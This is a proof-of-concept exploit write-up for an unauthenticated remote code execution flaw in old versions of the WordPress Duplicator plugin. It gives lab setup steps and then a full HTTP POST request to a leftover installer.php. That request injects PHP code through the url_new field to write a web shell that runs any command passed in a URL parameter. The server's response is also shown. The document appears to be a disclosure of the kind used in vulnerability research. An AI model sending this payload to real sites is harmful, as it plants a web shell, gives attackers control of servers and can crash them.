Duplicator < 1.3.0 - Unauthenticated RCE

Proof of Concept

****Steps to Reproduce*****
***Setup***
Download WAMP with the following config:
- WAMP - v3.3.2
- Phpmyadmin - v4.9.11
- Apache - v2.4.58
- PHP - v5.6.40
- MySQL - v5.6.51
- MariaDB - v5.5.62
- Wordpress - v4.6

***Simulating admin forgetting to remove the installer.php files post-installation ***

1) Download Duplicator 1.1.6 from https://downloads.wordpress.org/plugin/duplicator.1.1.6.zip install plugin your wordpress site via the admin dashboard and activate it.

2) navigate to the 'duplicator' tab on the admin dashboard.

3) Click on 'create new' and follow the steps to generate a installer.php file.

4) Download the installer.php file and place it on your wordpress directory to simulate a administrator forgetting to remove the installer.php and/or installer-backup.php files post-installation.


****POC******
**Request**
POST /wordpress/installer.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 124
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close

action_ajax=2&action_step=2&url_new=TESTING');file_put_contents("Delvy.php",'<pre><?php system($_GET["cmd"]); ?></pre>'); /*

**Response**
HTTP/1.1 200 OK
Date: Fri, 08 Dec 2023 14:53:40 GMT
Server: Apache/2.4.58 (Win64) PHP/5.6.40 mod_fcgid/2.3.10-dev
X-Powered-By: PHP/5.6.40
Content-Length: 529
Connection: close
Content-Type: text/html; charset=UTF-8

 {"step1":null,"step2":{"scan_tables":0,"scan_rows":0,"scan_cells":0,"updt_tables":0,"updt_rows":0,"updt_cells":0,"errsql":[],"errser":[],"errkey":[],"errsql_sum":0,"errser_sum":0,"errkey_sum":0,"time":"0.0000 sec.","err_all":0,"warn_all":1,"warnlist":["WP-CONFIG WARNING: The wp-config.php has one or more of these values \"WP_CONTENT_DIR, WP_CONTENT_URL, WPCACHEHOME, COOKIE_DOMAIN, WP_SITEURL, WP_HOME, WP_TEMP_DIR\" which may cause issues please validate these values by opening the file."],"pass":1}}

***Important***
Do note that if the following POC is ran on an apache server it will DOS the web app!!!